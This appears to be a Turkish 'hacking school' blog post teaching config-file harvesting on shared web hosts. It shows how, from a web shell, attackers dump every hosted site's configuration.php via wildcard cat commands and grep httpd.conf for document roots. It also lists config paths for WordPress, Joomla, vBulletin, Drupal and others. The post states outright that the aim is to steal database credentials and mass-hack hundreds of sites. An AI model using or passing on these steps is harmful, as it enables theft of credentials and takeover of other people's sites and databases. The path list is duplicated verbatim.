CONFİG NEDİR? Ne İşimize Yarıyacak? Config Çekme Örnekleri. - Hackerlik Okulu
CONFİG NEDİR?
Config sitenin bilgilerinin bulunduğu ve diğer sitelerin serwerlarıyla iletişimin sağlandığı dosyadır.Tam adı config.php (wordpress) ya da configuration.php'dir (joomla).
Ne İşimize Yarıyacak?
Evet,gelelim asıl mevzuya ne işe yarıyacağına.Biz config dosyasından db adını,db şifresini ve db kullanıcı adını alarak bi de port değişikse onu da configten öğrenerek shellin sql bölümünden kendi sitemize bağlanabiliriz. Ee diyorsunuz zaten shell attığım bir siteye bağlansam ne olacak? Zaten amaç bu değil; asıl amaç config dosyasının içindeki bilgileri çekmek. Sizin görebildiğiniz kendi sitenizin bilgileri, fakat birkaç işlemle config çekebilirsek sunucuda bulunan bütün sitelerin config.phpsine ulaşabiliriz. Bu da şu demek oluyor,1 siteyle 100'lerce, 1000'lerce site hackleyebiliriz. İşte shellin sql bölümünden sitelere bağlanabiliriz, ve şifrelerini değiştirip hepsini hackliyebiliriz. Config dosyasının işlevi bu. Çekildikten sonra db adı,portu,şifresi ve kullancı adıyla her sitenin serverına dalabiliriz.
İsterseniz yaparsınız ama yorar bu yüzden ya manuel yöntemlerle ya da shell aracılığıyla çekilmiş config içinde olan tüm siteleri hacklemeye çalışması için yazılmış php materyaller var. Bu mataryalleri internetten temin edebilir ve bir tuşla çekilmiş configteki sitelerin şifresini değiştirebilir veya topluca hackliyebilirsiniz.
Örnekler :
Kod:
/home/kullaniciadi/public_html/ Şeklindeyse Dizin : cat /home/*/public_html/configuration.php>>configler.txt
Kod:
/var/www/vhosts/siteismi.com/httpdocs Şeklindeyse Dizin : cat /var/www/vhosts/*/httpdocs/configuration.php>>configler.txt
Tabi bunlar basit olanlar.. Cat de permission varsa tac kullanabilirsiniz..
Tabi birde şöyle olabiliyor
Kod:
: /hermes/bosweb/web015/b157/sl.kyleand1/public_html/stonezone/bamapparel
Bu durumda arkadaşlar
Kod:
locate "httpd.conf"
deyip httpd.conf dosyamızı aratıyoruz..
Genelde
Kod:
"/usr/local/apache/conf/httpd.conf
" burda olur..
Kod:
cat /usr/local/apache/conf/httpd.conf |grep ********Root
İle Klasorlerin hepsini görebilirsiniz..
Kod:
cat /usr/local/apache/conf/httpd.conf |grep ********Root>>klasorler.txt
klasorler.txt ye kaydedip düzenlersiniz..
Kod:
Örnek İlk Hali : ********Root /hermes/bosweb/web015/b157/sl.kyleand1/z/s/public_html
Örnek Son Hali : cat hermes/bosweb/web015/b157/sl.kyleand1/z/s/public_html/configuration.php>>config.txt
şeklinde yapabilirsiniz..
Excel İle yapabilirsiniz.. yada size kalmış dft009
Birde şu Kodumuz var
Kod:
cat /usr/local/apache/conf/httpd.conf |grep ServerName
Bu kodlada Serverdaki Siteleri Bulursunuz..
Freebsdlerde httpd.conf yerine
Kod:
"hosting.conf"
olabilir..
Tabi burdaki configuration.php size kalmış Joomla’ların ayar dosyasını size kaydeder.. Siz bunu vbulletin smf vb.. olarak yapabilirsiniz..
Örnek Script Config Yolları :
php nuke -> . /config.php
vbulettin->. /includes/config.php
mybb -> . /inc/config.php
phpbb -> . /config.php
smf -> Settings.php
joomla -> configuration.php , configuration.php-dist
wordpress -> wp-config.php
seditio -> datas/config.php
drupal sistem:/home/user/public_html/sites/default/settings.php
setidio:/home/site/public_html/datas/config.php
vbulletin: /home/site/public_html/includes/config.php
vbulletin: /home/site/public_html/includes/class_core.php
Tabi bu işlemleri Root olmanıza gerek yok .. Geçişler varsada yapabilirsiniz..
uid = 43(apache) vb..
Örnek Script Config Yolları :
php nuke -> . /config.php
vbulettin->. /includes/config.php
mybb -> . /inc/config.php
phpbb -> . /config.php
smf -> Settings.php
joomla -> configuration.php , configuration.php-dist
wordpress -> wp-config.php
seditio -> datas/config.php
drupal sistem:/home/user/public_html/sites/default/settings.php
setidio:/home/site/public_html/datas/config.php
vbulletin: /home/site/public_html/includes/config.php
vbulletin: /home/site/public_html/includes/class_core.php
Tabi bu işlemleri Root olmanıza gerek yok .. Geçişler varsada yapabilirsiniz..
uid = 43(apache) vb..
Yorumlar
Yorum Gönder